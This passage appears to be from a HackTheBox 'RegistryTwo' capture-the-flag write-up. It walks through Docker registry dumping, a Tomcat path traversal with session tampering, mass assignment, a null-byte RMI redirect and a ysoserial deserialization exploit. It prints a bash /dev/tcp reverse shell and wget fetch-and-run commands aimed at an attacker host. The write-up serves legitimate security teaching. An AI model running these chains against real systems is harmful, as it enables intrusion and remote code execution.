(venv) oxdf@hacky$ TOKEN=$(curl -sk 'https://webhosting.htb:5001/auth?service=Docker+registry&scope=registry:catalog:*' | jq -r .token)
(venv) oxdf@hacky$ python drg.py https://webhosting.htb -A $TOKEN --list
[+] hosting-app
That same token will fail to download, but switching just like above, it will get all the blobs:
(venv) oxdf@hacky$ python drg.py https://webhosting.htb -A $TOKEN --dump hosting-app
[+] BlobSum found 36
[+] Dumping hosting-app
[+] Downloading : a3ed95caeb02ffe68cdd9fd84406680ae93d633cb16422d00e8a7c22955b46d4
[+] Downloading : a3ed95caeb02ffe68cdd9fd84406680ae93d633cb16422d00e8a7c22955b46d4
[+] Downloading : 0bf45c325a696381eea5176baa1c8e84fbf0fe5e2ddf96a22422b10bf879d0ba
[+] Downloading : 4a19a05f49c2d93e67d7c9ea8ba6c310d6b358e811c8ae37787f21b9ad82ac42
[+] Downloading : 9e700b74cc5b6f81ed6513fa03c7b6ab11a71deb8e27604632f723f81aca3268
[+] Downloading : b5ac54f57d23fa33610cb14f7c21c71aa810e58884090cead5e3119774a202dc
[+] Downloading : 396c4a40448860471ae66f68c261b9a0ed277822b197730ba89cb50528f042c7
[+] Downloading : 9d5bcc17fed815c4060b373b2a8595687502925829359dc244dd4cdff777a96c
[+] Downloading : ab55eca3206e27506f679b41b39ba0e4c98996fa347326b6629dae9163b4c0ec
[+] Downloading : a3ed95caeb02ffe68cdd9fd84406680ae93d633cb16422d00e8a7c22955b46d4
[+] Downloading : a3ed95caeb02ffe68cdd9fd84406680ae93d633cb16422d00e8a7c22955b46d4
[+] Downloading : f7b708f947c32709ecceaffd85287d5eb9916a3013f49c8416228ef22c2bf85e
[+] Downloading : 497760bf469e19f1845b7f1da9cfe7e053beb57d4908fb2dff2a01a9f82211f9
[+] Downloading : a3ed95caeb02ffe68cdd9fd84406680ae93d633cb16422d00e8a7c22955b46d4
[+] Downloading : a3ed95caeb02ffe68cdd9fd84406680ae93d633cb16422d00e8a7c22955b46d4
[+] Downloading : a3ed95caeb02ffe68cdd9fd84406680ae93d633cb16422d00e8a7c22955b46d4
[+] Downloading : a3ed95caeb02ffe68cdd9fd84406680ae93d633cb16422d00e8a7c22955b46d4
[+] Downloading : a3ed95caeb02ffe68cdd9fd84406680ae93d633cb16422d00e8a7c22955b46d4
[+] Downloading : e4cc5f625cda9caa32eddae6ac29b170c8dc1102988b845d7ab637938f2f6f84
[+] Downloading : a3ed95caeb02ffe68cdd9fd84406680ae93d633cb16422d00e8a7c22955b46d4
[+] Downloading : 0da484dfb0612bb168b7258b27e745d0febf56d22b8f10f459ed0d1dfe345110
[+] Downloading : a3ed95caeb02ffe68cdd9fd84406680ae93d633cb16422d00e8a7c22955b46d4
[+] Downloading : a3ed95caeb02ffe68cdd9fd84406680ae93d633cb16422d00e8a7c22955b46d4
[+] Downloading : a3ed95caeb02ffe68cdd9fd84406680ae93d633cb16422d00e8a7c22955b46d4
[+] Downloading : 7b43ca85cb2c7ccc62e03067862d35091ee30ce83e7fed9e135b1ef1c6e2e71b
[+] Downloading : a3ed95caeb02ffe68cdd9fd84406680ae93d633cb16422d00e8a7c22955b46d4
[+] Downloading : a3ed95caeb02ffe68cdd9fd84406680ae93d633cb16422d00e8a7c22955b46d4
[+] Downloading : fa7536dd895ade2421a9a0fcf6e16485323f9e2e45e917b1ff18b0f648974626
[+] Downloading : a3ed95caeb02ffe68cdd9fd84406680ae93d633cb16422d00e8a7c22955b46d4
[+] Downloading : a3ed95caeb02ffe68cdd9fd84406680ae93d633cb16422d00e8a7c22955b46d4
[+] Downloading : a3ed95caeb02ffe68cdd9fd84406680ae93d633cb16422d00e8a7c22955b46d4
[+] Downloading : a3ed95caeb02ffe68cdd9fd84406680ae93d633cb16422d00e8a7c22955b46d4
[+] Downloading : 5de5f69f42d765af6ffb6753242b18dd4a33602ad7d76df52064833e5c527cb4
[+] Downloading : a3ed95caeb02ffe68cdd9fd84406680ae93d633cb16422d00e8a7c22955b46d4
[+] Downloading : a3ed95caeb02ffe68cdd9fd84406680ae93d633cb16422d00e8a7c22955b46d4
[+] Downloading : ff3a5c916c92643ff77519ffa742d3ec61b7f591b6b7504599d95a4a41134e28
They are all all gzip data:
(venv) oxdf@hacky$ file hosting-app/*
hosting-app/0bf45c325a696381eea5176baa1c8e84fbf0fe5e2ddf96a22422b10bf879d0ba.tar.gz: gzip compressed data, original size modulo 2^32 2560
hosting-app/0da484dfb0612bb168b7258b27e745d0febf56d22b8f10f459ed0d1dfe345110.tar.gz: gzip compressed data, original size modulo 2^32 16436736
hosting-app/396c4a40448860471ae66f68c261b9a0ed277822b197730ba89cb50528f042c7.tar.gz: gzip compressed data, original size modulo 2^32 23533056
hosting-app/497760bf469e19f1845b7f1da9cfe7e053beb57d4908fb2dff2a01a9f82211f9.tar.gz: gzip compressed data, original size modulo 2^32 21474816
hosting-app/4a19a05f49c2d93e67d7c9ea8ba6c310d6b358e811c8ae37787f21b9ad82ac42.tar.gz: gzip compressed data, original size modulo 2^32 39337472
hosting-app/5de5f69f42d765af6ffb6753242b18dd4a33602ad7d76df52064833e5c527cb4.tar.gz: gzip compressed data, original size modulo 2^32 3584
hosting-app/7b43ca85cb2c7ccc62e03067862d35091ee30ce83e7fed9e135b1ef1c6e2e71b.tar.gz: gzip compressed data, original size modulo 2^32 2560
hosting-app/9d5bcc17fed815c4060b373b2a8595687502925829359dc244dd4cdff777a96c.tar.gz: gzip compressed data, original size modulo 2^32 5632
hosting-app/9e700b74cc5b6f81ed6513fa03c7b6ab11a71deb8e27604632f723f81aca3268.tar.gz: gzip compressed data, original size modulo 2^32 12288
hosting-app/a3ed95caeb02ffe68cdd9fd84406680ae93d633cb16422d00e8a7c22955b46d4.tar.gz: gzip compressed data, truncated
hosting-app/ab55eca3206e27506f679b41b39ba0e4c98996fa347326b6629dae9163b4c0ec.tar.gz: gzip compressed data, original size modulo 2^32 3584
hosting-app/b5ac54f57d23fa33610cb14f7c21c71aa810e58884090cead5e3119774a202dc.tar.gz: gzip compressed data, original size modulo 2^32 4608
hosting-app/e4cc5f625cda9caa32eddae6ac29b170c8dc1102988b845d7ab637938f2f6f84.tar.gz: gzip compressed data, original size modulo 2^32 118784
hosting-app/f7b708f947c32709ecceaffd85287d5eb9916a3013f49c8416228ef22c2bf85e.tar.gz: gzip compressed data, original size modulo 2^32 2048
hosting-app/fa7536dd895ade2421a9a0fcf6e16485323f9e2e45e917b1ff18b0f648974626.tar.gz: gzip compressed data, original size modulo 2^32 78615552
hosting-app/ff3a5c916c92643ff77519ffa742d3ec61b7f591b6b7504599d95a4a41134e28.tar.gz: gzip compressed data, original size modulo 2^32 4403200
I could dig into each of these individually, which would show me what stands out from the base image, but I’ll start by running the container.
Rather than enumerate all the layers of the image, I’ll start it and take a look:
oxdf@hacky$ docker run --rm -d webhosting.htb:5000/hosting-app
d96217d9cf0df1eee04a0d3e2a0c35cae682ceeb568629db044b030eff527307
Looking at the running image shows the image command is catalina.sh run
:
oxdf@hacky$ docker ps
CONTAINER ID IMAGE COMMAND CREATED STATUS PORTS NAMES
d96217d9cf0d webhosting.htb:5000/hosting-app "catalina.sh run" 8 seconds ago Up 7 seconds 8080/tcp unruffled_kilby
Catalina is the Tomcat servlet container. catalina.sh
is a part of tomcat, and the run
command starts Catalina.
The script is in /usr/local/tomcat/bin/
:
oxdf@hacky$ docker exec -it --user root unruffled_kilby /bin/bash
bash-4.4# find / -name 'catalina.sh' 2>/dev/null
/usr/local/tomcat/bin/catalina.sh
In /usr/local/tomcat/webapps
there’s a hosting.war
file. This is the application that manages the website at /hosting
. I’ll copy it to my system from the container:
oxdf@hacky$ docker cp unruffled_kilby:/usr/local/tomcat/webapps/hosting.war .
Successfully copied 23.5MB to /home/oxdf/hackthebox/registrytwo-10.10.11.223/.
A Java WAR file is a Java archive containing all the files needed for a web application. I’ll open this one in jd-gui.
META-INF
has very basic metadata about the application. The resources
has CSS and the .jsp
and .html
files at the bottom are templates for the various pages. The interesting stuff is in WEB-INF
. web.xml
is a basic config file. lib
has the various libraries used by the app:
jsp
has various templates for different pages on the site:
The classes
directory has the code for the side:
The class
files in services
are the ones that define routes for the webserver. For example, in AuthenticationSevlet.cass
, it defines the /auth/signin
route:
The doGet
and doPost
methods handle those requests, eventually making a RequestDispatcher
referencing one of the .jsp
files as a template. Other endpoints defined as /autosave
, /reconfigure
, /panel
, /domains/*
, /edit
, /logout
, /profile
, /auth/signup
, and /view/*
.
The rmi
folder is of particular interest. RMI (remote method invocation) is a Java idea kind of like remote procedure calls (RPC) in C, but rather than sending data structures, Java objects are passed between processes. This post does a really nice job of going into detail as to not only what RMI is, but how to pentest it (it is in Chinese, but Google Translate does a nice job).
The RMIClientWrapper.class
file creates a RMIClientWrapper
object, which gets the FileService
:
public class RMIClientWrapper {
private static final Logger log = Logger.getLogger(com.htb.hosting.rmi.RMIClientWrapper.class.getSimpleName());
public static FileService get() {
try {
String rmiHost = (String)Settings.get(String.class, "rmi.host", null);
if (!rmiHost.contains(".htb"))
rmiHost = "registry.webhosting.htb";
System.setProperty("java.rmi.server.hostname", rmiHost);
System.setProperty("com.sun.management.jmxremote.rmi.port", "9002");
log.info(String.format("Connecting to %s:%d", new Object[] { rmiHost, Settings.get(Integer.class, "rmi.port", Integer.valueOf(9999)) }));
Registry registry = LocateRegistry.getRegistry(rmiHost, ((Integer)Settings.get(Integer.class, "rmi.port", Integer.valueOf(9999))).intValue());
return (FileService)registry.lookup("FileService");
} catch (Exception e) {
e.printStackTrace();
throw new RuntimeException(e);
}
}
}
The interesting part is that it loads up the rmi.host
from the Settings
class, and as long as it ends in .htb
, it will connect to port 9002. If I can get that to connect to me, there will be a way to exploit it.
There is a /reconfigure
endpoint that is also interesting:
@WebServlet(name = "reconfigure", value = {"/reconfigure"})
public class ConfigurationServlet extends AbstractServlet {
private static final long serialVersionUID = -2336661269816738483L;
public void doGet(HttpServletRequest request, HttpServletResponse response) throws IOException, ServletException {
if (!checkManager(request, response))
return;
RequestDispatcher rd = request.getRequestDispatcher("/WEB-INF/jsp/configuration.jsp");
rd.include((ServletRequest)request, (ServletResponse)response);
}
public void doPost(HttpServletRequest request, HttpServletResponse response) throws IOException, ServletException {
if (!checkManager(request, response))
return;
Map<String, String> parameterMap = new HashMap<>();
request.getParameterMap().forEach((k, v) -> parameterMap.put(k, v[0]));
Settings.updateBy(parameterMap);
RequestDispatcher rd = request.getRequestDispatcher("/WEB-INF/jsp/configuration.jsp");
request.setAttribute("message", "Settings updated");
rd.include((ServletRequest)request, (ServletResponse)response);
}
private static boolean checkManager(HttpServletRequest request, HttpServletResponse response) throws IOException {
boolean isManager = (request.getSession().getAttribute("s_IsLoggedInUserRoleManager") != null);
if (!isManager)
response.sendRedirect(request.getContextPath() + "/panel");
return isManager;
}
public void destroy() {}
}
The POST request handler updates the Settings
object with whatever is passed to it. There is, however, a call to checkManager
first before a user is allowed access via either GET or POST. This function checks the user’s session object for the Is_LoggedInUserRoleManager
variable to be set.
A common misconfiguration to look for in Tomcat servers is a path traversal with ..;/
. It has a section in Hacktricks, and goes all the way back to the famous 2018 Blackhat presentation I’ve referenced many times, Breaking Parser Logic! by Orange Tsai:
Given that it seems clear that nginx is handing off to Tomcat at the /hosting
level, it’s worth trying there. If I try to visit /hosting/..;/
, it returns an empty 404. That’s different than if I visit /hosting/0xdf
, which redirects to /hosting/auth/signin
. That’s a good sign this issue is present. I’ll try /hosting/..;/manager/html
, and it asks for basic auth:
When I don’t have the password, it shows the Tomcat auth failed page:
Even if I can’t access the Tomcat manager, that looks like path traversal.
Without creds, I can’t access the Tomcat manager admin panel. Another thing to look for on Tomcat is the examples directory. Visiting /hosting/..;/examples/
finds the page:
One Example that shows up in a lot of bug bounty reports / blog posts (example, example, example) is SessionExample
, in the “Servlet examples”:
Through this page, I can get and set session attributes for my session. If I don’t have a session with the site, it looks empty like that. If I log in:
If I open a file for editing in the file editor on www.webhosting.htb
and refresh this Sessions Example page, there’s a new attribute associated with my session:
The attribute looks like s_EditingMedia_[base64 id] = /tmp/[random hex]
. The URL for editing a file is /hosting/edit?tmpid=[base64 id]
, matching that session attribute.
I’ll update the value of that session attribute to be /etc/passwd
using the example form:
On reloading the /edit
page, there’s /etc/passwd
:
Trying to save returns a 500 error (which makes sense, as this user almost certainly can’t write this file).
One unintended path is to use this file read to completely skip the Docker Registry stuff above, and pull the War file here. I’ll show that in Beyond Root.
I noticed above that I needed an admin session to get to /hosting/reconfigure
. If I visit while just normally logged in, it redirects to /hosting/panel
. But, if I set s_IsLoggedInUserRoleManager
to anything via the Session Example and try again, it works:
This panel gives the opportunity to change the max domains and index template.
Submitting the form on /hosting/reconfigure
sends a POST request setting domains.max
and domains.start-template
:
POST /hosting/reconfigure HTTP/1.1
Host: www.webhosting.htb
Cookie: JSESSIONID=05DD8FF85C2D1D377E5C363008CD39A5
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:121.0) Gecko/20100101 Firefox/121.0
Content-Type: application/x-www-form-urlencoded
Content-Length: 107
Origin: https://www.webhosting.htb
Referer: https://www.webhosting.htb/hosting/reconfigure
Connection: close
domains.max=6&domains.start-template=%3Cbody%3E%0D%0A%3Ch1%3E0xdf+was+here%21%3C%2Fh1%3E%0D%0A%3C%2Fbody%3E
Looking again at the code that handles POST requests, it doesn’t seem to worry about POST parameters are sent:
public void doPost(HttpServletRequest request, HttpServletResponse response) throws IOException, ServletException {
if (!checkManager(request, response))
return;
Map<String, String> parameterMap = new HashMap<>();
request.getParameterMap().forEach((k, v) -> parameterMap.put(k, v[0]));
Settings.updateBy(parameterMap);
RequestDispatcher rd = request.getRequestDispatcher("/WEB-INF/jsp/configuration.jsp");
request.setAttribute("message", "Settings updated");
rd.include((ServletRequest)request, (ServletResponse)response);
}
It just loops over all the POST parameters, maps them into a map object, and passes that to update the settings. That’s going to be vulnerable to mass assignment.
The RMI class starts by getting the settings value for rmi.host
, which I should be able to set via the mass assignment vulnerability above. However, it then checks that the value ends with “.htb”, setting it to “registry.webhosting.htb” if it doesn’t:
String rmiHost = (String)Settings.get(String.class, "rmi.host", null);
if (!rmiHost.contains(".htb"))
rmiHost = "registry.webhosting.htb";
I can by pass this with a null byte. I’ll send the /hosting/reconfigure
POST request to Burp Repeater, and add &rmi.host=10.10.14.6%00.htb
to the end:
It seems to work. I’ll start nc
listening on 9002, and on loading /hosting
in a browser, there’s a connection:
oxdf@hacky$ nc -lnvp 9002
Listening on 0.0.0.0 9002
Connection received on 10.10.11.223 51140
JRMIK
One of HTB’s top players qtc has a tool, remote-method-guesser, which has a listen
mode:
Sometimes it is required to provide a malicious JRMPListener, which serves deserialization payloads to incoming RMI connections. Writing such a listener from scratch is not necessary, as it is already provided by the ysoserial project. remote-method-guesser provides a wrapper around the ysoserial implementation, which lets you spawn a JRMPListener
That’s exactly what I need here. I’ll need to have a copy of the ysoserial Jar file on my host. Mine is at /opt/ysoserial/ysoserial-all.jar
. There’s a bunch of issues with this tool with newer versions of java. This issue on it’s GitHub talks about how to make it work with OpenJDK17, but also mentions it just works with OpenJDK11. I’ve got 11 installed on my system, so I’ll just use update-alternatives
to select it:
oxdf@hacky$ sudo update-alternatives --config java
There are 4 choices for the alternative java (providing /usr/bin/java).
Selection Path Priority Status
------------------------------------------------------------
0 /usr/lib/jvm/java-18-openjdk-amd64/bin/java 1811 auto mode
1 /usr/lib/jvm/java-11-openjdk-amd64/bin/java 1111 manual mode
* 2 /usr/lib/jvm/java-17-openjdk-amd64/bin/java 1711 manual mode
3 /usr/lib/jvm/java-18-openjdk-amd64/bin/java 1811 manual mode
4 /usr/local/java/jdk1.8.0_391/bin/java 1 manual mode
Press <enter> to keep the current choice[*], or type selection number: 1
update-alternatives: using /usr/lib/jvm/java-11-openjdk-amd64/bin/java to provide /usr/bin/java (java) in manual mode
This fixes errors like this:
oxdf@hacky$ java -jar /opt/ysoserial/ysoserial-all.jar CommonsCollections6 'wget 10.10.14.6/test'
Error while generating or serializing payload
java.lang.reflect.InaccessibleObjectException: Unable to make field private transient java.util.HashMap java.util.HashSet.map accessible: module java.base does not "opens java.util" to unnamed module @5a6d67c3
at java.base/java.lang.reflect.AccessibleObject.checkCanSetAccessible(AccessibleObject.java:354)
at java.base/java.lang.reflect.AccessibleObject.checkCanSetAccessible(AccessibleObject.java:297)
at java.base/java.lang.reflect.Field.checkCanSetAccessible(Field.java:178)
at java.base/java.lang.reflect.Field.setAccessible(Field.java:172)
at ysoserial.payloads.util.Reflections.setAccessible(Reflections.java:26)
at ysoserial.payloads.CommonsCollections6.getObject(CommonsCollections6.java:74)
at ysoserial.payloads.CommonsCollections6.getObject(CommonsCollections6.java:36)
at ysoserial.GeneratePayload.main(GeneratePayload.java:34)
And this:
oxdf@hacky$ java -jar ./rmg.jar listen 10.10.14.6 9002 CommonsCollections6 'wget 10.10.14.6/test'
[+] Creating ysoserial payload... failed.
[-] Caught unexpected java.lang.reflect.InvocationTargetException during gadget generation.
[-] You probably specified a wrong gadget name or an invalid gadget argument.
[-] Cannot continue from here.
I’ll clone remote-method-guesser
to my system, and as in the install instructions, go into that directory. Before running mvn package
, I’ll edit src/config.properties
, setting yso = /opt/ysoserial/ysoserial-all.jar
. Now mvn package
creates target/rmg-5.0.0-jar-with-dependencies.jar
, which I’ll move up a directory and name rmg.jar
.
At this point, I need to give rmg.jar
a payload and a command. Both of these are a bit tricky. I know the commons-collections-3.1.jar
is on the server from the lib
directory. That means the payloads CommonsCollections1
, CommonsCollections3
, CommonsCollections5
, CommonsCollections6
, and CommonsCollections7
could work.
It also seems likely that I’ll be dropping into a container (for such a complex web setup on an insane box), so I will have to try a few different Linux commands to see if it works (ping
, curl
, wget
). With some trial and error, I find that CommonsCollections5
plus wget
works.
I’ll start rmg
:
oxdf@hacky$ java -jar ./rmg.jar listen 10.10.14.6 9002 CommonsCollections5 'wget 10.10.14.6/rce'
[+] Creating ysoserial payload... done.
[+] Creating a JRMPListener on 10.10.14.6:9002.
[+] Handing off to ysoserial...
There’s a relatively quick cleanup on the rmi.host
variable, so I’ll keep that POST request in Repeater so I can quickly send it to reset it back to my host. After sending, I’ll refresh /hosting/panel
:
oxdf@hacky$ java -jar ./rmg.jar listen 10.10.14.6 9002 CommonsCollections5 'wget 10.10.14.6/rce'
[+] Creating ysoserial payload... done.
[+] Creating a JRMPListener on 10.10.14.6:9002.
[+] Handing off to ysoserial...
Have connection from /10.10.11.223:44232
Reading message...
Sending return with payload for obj [0:0:0, 0]
Closing connection
Just after, there’s a hist on my Python webserver:
10.10.11.223 - - [29/Jan/2024 09:16:28] code 404, message File not found
10.10.11.223 - - [29/Jan/2024 09:16:28] "GET /rce HTTP/1.1" 404 -
Java is very picky about characters that break up commands like |
and &
and ;
. To be safe, I’ll just get a shell in two steps. First, I’ll create a simple shell.sh
containing a simple bash reverse shell:
#!/bin/bash
bash -i >& /dev/tcp/10.10.14.6/443 0>&1
I’ll have the server fetch this:
oxdf@hacky$ java -jar ./rmg.jar listen 10.10.14.6 9002 CommonsCollections5 'wget 10.10.14.6/shell.sh'
[+] Creating ysoserial payload... done.
[+] Creating a JRMPListener on 10.10.14.6:9002.
[+] Handing off to ysoserial...
Have connection from /10.10.11.223:52008
Reading message...
Sending return with payload for obj [0:0:0, 0]
RegistryTwo requests the script from my server:
10.10.11.223 - - [29/Jan/2024 09:17:52] "GET /shell.sh HTTP/1.1" 200 -
wget
should save it in the current directory. I’ll stop rmg
and rerun with a command to run it:
oxdf@hacky$ java -jar ./rmg.jar listen 10.10.14.6 9002 CommonsCollections5 'bash shell.sh'
[+] Creating ysoserial payload... done.
[+] Creating a JRMPListener on 10.10.14.6:9002.
[+] Handing off to ysoserial...
Have connection from /10.10.11.223:33230
Reading message...
Sending return with payload for obj [0:0:0, 0]
Closing connection
This time there’s a shell at nc
:
oxdf@hacky$ nc -lnvp 443
Listening on 0.0.0.0 443
Connection received on 10.10.11.223 47188
bash: cannot set terminal process group (1): Not a tty
bash: no job control in this shell
bash-4.4$
It’s not worth a full Beyond Root section, but curl
didn’t work because it’s not in this container:
bash-4.4$ curl
bash: curl: command not found
ping
is busybox, which isn’t SetUID, so it fails:
bash-4.4$ ping 10.10.14.6
PING 10.10.14.6 (10.10.14.6): 56 data bytes
ping: permission denied (are you root?)
bash-4.4$ ls -l /bin/ping
lrwxrwxrwx 1 root root 12 Jan 9 2018 /bin/ping -> /bin/busybox
bash-4.4$ ls -l /bin/busybox
-rwxr-xr-x 1 root root 805024 Dec 12 2017 /bin/busybox
The intended way to get execution on the box is very similar to the attack I showed above, but rather than exploiting RMI, messing with the JDBC connection string and perform a deserialization attack similar to what’s shown here. It is very similar, though slightly more complex to pull off. It does use the same building blocks, changing mysql.host
rather than rmi.host
, and without the need for the null byte.
The shell is in a container. There’s a .dockerenv
file in the system root, which is always a good sign:
bash-4.4$ ls -la /.dockerenv
-rwxr-xr-x 1 root root 0 Jul 4 2023 /.dockerenv
The container has a docker0
interface but also is sharing the IP of the main host:
bash-4.4$ ifconfig
br-59a3a780b7b3 Link encap:Ethernet HWaddr 02:42:75:A5:14:1F
inet addr:172.19.0.1 Bcast:172.19.255.255 Mask:255.255.0.0
inet6 addr: fe80::42:75ff:fea5:141f/64 Scope:Link
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:399519 errors:0 dropped:0 overruns:0 frame:0
TX packets:351989 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:1212049149 (1.1 GiB) TX bytes:27562840 (26.2 MiB)
docker0 Link encap:Ethernet HWaddr 02:42:95:D0:18:38
inet addr:172.17.0.1 Bcast:172.17.255.255 Mask:255.255.0.0
UP BROADCAST MULTICAST MTU:1500 Metric:1
RX packets:0 errors:0 dropped:0 overruns:0 frame:0
TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:0 (0.0 B) TX bytes:0 (0.0 B)
eth0 Link encap:Ethernet HWaddr 00:50:56:B9:A1:E9
inet addr:10.10.11.223 Bcast:10.10.11.255 Mask:255.255.254.0
inet6 addr: dead:beef::250:56ff:feb9:a1e9/64 Scope:Global
inet6 addr: fe80::250:56ff:feb9:a1e9/64 Scope:Link
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:1464323 errors:0 dropped:0 overruns:0 frame:0
TX packets:1654034 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:216693743 (206.6 MiB) TX bytes:1715473938 (1.5 GiB)
lo Link encap:Local Loopback
inet addr:127.0.0.1 Mask:255.0.0.0
inet6 addr: ::1/128 Scope:Host
UP LOOPBACK RUNNING MTU:65536 Metric:1
RX packets:5564363 errors:0 dropped:0 overruns:0 frame:0
TX packets:5564363 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:723677305 (690.1 MiB) TX bytes:723677305 (690.1 MiB)
veth6283b47 Link encap:Ethernet HWaddr EE:0A:E8:AD:8F:93
inet6 addr: fe80::ec0a:e8ff:fead:8f93/64 Scope:Link
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:368307 errors:0 dropped:0 overruns:0 frame:0
TX packets:320511 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:1209629999 (1.1 GiB) TX bytes:21909415 (20.8 MiB)
veth9ec563c Link encap:Ethernet HWaddr 76:B5:59:8D:6A:4B
inet6 addr: fe80::74b5:59ff:fe8d:6a4b/64 Scope:Link
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:31212 errors:0 dropped:0 overruns:0 frame:0
TX packets:31717 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:8012416 (7.6 MiB) TX bytes:5670395 (5.4 MiB)
That’s not something seen often before on HTB, this comes from docker
using the host network driver:
If you use the
host
network mode for a container, that container’s network stack isn’t isolated from the Docker host (the container shares the host’s networking namespace), and the container doesn’t get its own IP-address allocated. For instance, if you run a container which binds to port 80 and you usehost
networking, the container’s application is available on port 80 on the host’s IP address.
app’s home directory is very bare:
bash-4.4$ ls -la ~
total 16
drwxr-sr-x 1 app app 4096 Jul 5 2023 .
drwxr-xr-x 1 root root 4096 Jul 5 2023 ..
-rw------- 1 app app 216 Jan 29 21:14 .bash_history
The only visible process is the Tomcat server. There’s nothing interesting in the Tomcat directories.
The WAR file makes a connection to registry.webhosting.htb:9002
for JMI. That host is defined as this one in the /etc/hosts
file:
127.0.0.1 localhost
::1 localhost ip6-localhost ip6-loopback
fe00::0 ip6-localnet
ff00::0 ip6-mcastprefix
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters
127.0.0.1 registry.webhosting.htb
Looking at the listening ports, it is listening on 9002:
bash-4.4$ netstat -tnlp
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:443 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:5000 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:5001 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:3310 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.53:53 0.0.0.0:* LISTEN -
tcp 0 0 :::22 :::* LISTEN -
tcp 0 0 :::443 :::* LISTEN -
tcp 0 0 :::45919 :::* LISTEN -
tcp 0 0 ::ffff:127.0.0.1:8005 :::* LISTEN 1/java
tcp 0 0 :::5000 :::* LISTEN -
tcp 0 0 :::8009 :::* LISTEN 1/java
tcp 0 0 :::5001 :::* LISTEN -
tcp 0 0 :::9002 :::* LISTEN -
tcp 0 0 :::3306 :::* LISTEN -
tcp 0 0 :::3310 :::* LISTEN -
tcp 0 0 :::8080 :::* LISTEN 1/java
It kind of looks like it’s only open on IPv6 (which I’ll come back to in Beyond Root for an unintended shortcut), but it is open on IPv4 as well:
bash-4.4$ nc -zv 127.0.0.1 9002
127.0.0.1 (127.0.0.1:9002) open
It’s not immediately clear because of how Docker is networking, but the RMI service is on the host.
I already abused the RMI connection with a deserialization attack to get execution in the container. I was able to do that just by seeing that RMI was in use, without actually looking at how it is used. The FileService
object (defined in com.htb.hosting.rmi.FileService.class
) is an interface
, which is like an abstract class in Java. It defines methods, what arguments they take, and the type of the return value, without actually giving any of the code the does that. This allows the code here to create a FileService
object and call the methods without having the actual code.
package WEB-INF.classes.com.htb.hosting.rmi;
import com.htb.hosting.rmi.AbstractFile;
import java.io.IOException;
import java.rmi.Remote;
import java.rmi.RemoteException;
import java.util.List;
public interface FileService extends Remote {
List<AbstractFile> list(String paramString1, String paramString2) throws RemoteException;
boolean uploadFile(String paramString1, String paramString2, byte[] paramArrayOfbyte) throws IOException;
boolean delete(String paramString) throws RemoteException;
boolean createDirectory(String paramString1, String paramString2) throws RemoteException;
byte[] view(String paramString1, String paramString2) throws IOException;
AbstractFile getFile(String paramString1, String paramString2) throws RemoteException;
AbstractFile getFile(String paramString) throws RemoteException;
void deleteDomain(String paramString) throws RemoteException;
boolean newDomain(String paramString) throws RemoteException;
byte[] view(String paramString) throws RemoteException;
}
There is some remote file store and this is how to interact with it. This class uses the AbstractFile
object, which is just a class that holds metadata about a file such as the display name, if it’s a directory, the size, the permissions, etc. The list
method returns an array of these objects.
The RMIClientWrapper
object has a single method, get
, that initializes and returns a FileService
object:
public class RMIClientWrapper {
private static final Logger log = Logger.getLogger(com.htb.hosting.rmi.RMIClientWrapper.class.getSimpleName());
public static FileService get() {
try {
String rmiHost = (String)Settings.get(String.class, "rmi.host", null);
if (!rmiHost.contains(".htb"))
rmiHost = "registry.webhosting.htb";
System.setProperty("java.rmi.server.hostname", rmiHost);
System.setProperty("com.sun.management.jmxremote.rmi.port", "9002");
log.info(String.format("Connecting to %s:%d", new Object[] { rmiHost, Settings.get(Integer.class, "rmi.port", Integer.valueOf(9999)) }));
Registry registry = LocateRegistry.getRegistry(rmiHost, ((Integer)Settings.get(Integer.class, "rmi.port", Integer.valueOf(9999))).intValue());
return (FileService)registry.lookup("FileService");
} catch (Exception e) {
e.printStackTrace();
throw new RuntimeException(e);
}
}
}
This is the code where I had to use the null byte to have it both contact my IP and end in ““.htb”.
com.htb.hosting.services.DomainServlet
is a primary user of the FileService
object. This servlet is responsible for creating domains, and adding, editing, and deleting files on them. For example, when it creates a new domain, it does that via the FileService
(which for some reason it seems to get a new one each time with RMIClientWrapper.get()
), and then uploads the default index.html
to that vhost:
Most of the function used seem to take a VHost name along with additional parameters as make sense for that task.
To imaging what is likely happening, when a VHost is created, it gets a directory that serves as the root for the webserver.
I’ll create my own client to read and list files on the RMI host.
Java can be finicky about how it gets compiled. I’ll download and follow the install instructions for the IntelliJ IDEA Community Edition. I’ll create a new project and give is a location and name:
It starts an empty project:
For this to work, I’m going to use some of the code from hosting-app.war
. The directory structures matter in Java, so I’ll mirror what’s in the WAR. I’ll right click on src
and select New -> Package, and name it com.htb.hosting.rmi
. On it, I’ll add a New File, and name it AbstractFile.java
. I’ll copy all the code from jd-gui
for that file and paste it into here. The only change I need to make is the package at the top is no longer WEB-INF.classes.com.htb.hosting.rmi
, but rather just com.htb.hosting.rmi
. I’ll do the same for FileService.class
.
I’ll do the same thing with RMIClientWrapper.java
, but this one needs a bit more editing. It is loading the com.htb.hosting.utils.config.Settings
class to get things like the name of the server to connect to. I’ll remove that import and modify the code to just connect to registry.webhosting.htb
:
package com.htb.hosting.rmi;
import java.rmi.registry.LocateRegistry;
import java.rmi.registry.Registry;
import java.util.logging.Logger;
public class RMIClientWrapper {
